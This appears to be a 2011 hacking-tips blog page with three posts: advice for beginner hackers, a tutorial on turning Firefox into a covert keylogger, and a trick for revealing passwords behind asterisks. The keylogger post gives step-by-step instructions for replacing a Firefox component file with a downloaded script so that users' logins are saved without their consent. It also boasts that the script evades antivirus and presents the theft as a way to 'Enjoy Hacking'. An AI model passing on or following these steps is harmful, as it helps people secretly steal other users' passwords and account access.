Showing posts with label Hacking Tricks and Tips. Show all posts
Showing posts with label Hacking Tricks and Tips. Show all posts

Tuesday, December 27, 2011

5 Things Every Beginner Hacker Should Know

This post is for everyone out there who actually want to become a true & good Hacker.


1. Never trust sites that ask you for money in return of Hacking Softwares or who claim to Hack Email Id’s in return of money. All such things are Scam. Nothing Works.

2. There is no direct software or tool to Hack Facebook, Google, Yahoo or any other big website. All the softwares that claim to do so are scam. They are just meant to take your money and in worse cases, those softwares have trojans or keyloggers in them. As a result your account gets hacked trying to hack others.

3. Never ever use the keyloggers or trojans you find as freeware on internet. Hackers are not fools. They compile keyloggers and trojans almost with any such software and when you install them, you are already hacked before even trying to hack others.

4. You are never going to be a good hacker without the knowledge of programming and scripting languages. When you are going to use only ready made softwares and would depend on them for hacking anything then your functionality would be limited upto the functionality of the software. When you are not going to use your brain , just doing the copy paste thing, then how can you even think of being a good hacker.

5. If you are a good Hacker, you already become a good programmer , a good script writer , a good web developer and an excellent security expert. Well any good Hacker have good knowledge of various aspects and programming languages, XSS (Cross Site Scripting ) , PHP Injection , SQL Injection , Phishing , Footprinting etc. You will have to be good at programing and scripting. And when you know the Various loop holes, vulnerabilities and security tips, you already become a Computer Security Expert.

So Never Ever Under estimate the term Hacker. A Hacker Is Not a person who just hacks email id’s or servers but a True Hacker is a Computer Genius who have the knowledge of computers more than anyone.

Sunday, December 11, 2011

Trick On How To Convert Mozilla Firefox v3 Into Keylogger


Do you want create your own working undectable keylogger and without any programming knowledge. The keylogger can store all the usernames and passwords of mozilla firefox without the user’s consent.

How this Keylogger Works?

Whenever you login into any website using mozilla firefox browser it always ask’s you whether you want to save password or not for that website.

We will be using a script that will not give the user option to save the password instead it will automatically save the passwords without user’s consent and we will retrieve them later.

Can this be detected by antivirus?

I have scanned it with Mcafee, Norton and Avast and it is totally undetectable.

Does It work on all websites?

It is working on almost all websites like Facebook, Hotmail, Yahoomail, MySpace, Digg, Etc. But this trick somehow failed on Gmail.

Now I will give you the step by step tutorial on how to use this trick.

1. Download this script here and now go to the following address. If you are Windows user then goto C:/Program Files/Mozilla Firefox/Components If you are MAC user then goto Applications >Right click Firefox >Show Package Contents >Contents/MacOS/Components

2. Now find a file nsLoginManagerPrompter.js and copy it to somewhere safe location because we will be replacing this file in next step.

3. Extract the script folder that you have downloaded in first step and copy and paste the nsLoginManagerPrompter.js from the folder to the folder mentioned in step 1. So now your firefox keylogger is ready. Now Each and every username and password will be automatically saved.

How to retrieve Username & Passwords?

Go to Tools > Options > Security > Saved Passwords ...


Then you will see the list with Username & Passwords ... Enjoy Hacking :)

Thursday, September 29, 2011

View Passwords Behind star Asterisks

How To View Passwords Behind Asterisks?


Have you saved your password for a particular site and now you have forgot the password that you saved and now it only appears as ********* and u want to get that password.




Simply follow the steps:


1. Copy the following JavaScript code.(It exists bellow. plz download the code as it is a script)
2. Open the site in a new browser window or tab.
3. When you see the asterisks ********* appear then paste the below JAVA code in the address bar and hit enter.



Download JavaScript Code Link 1
Download JavaScript Code Link 2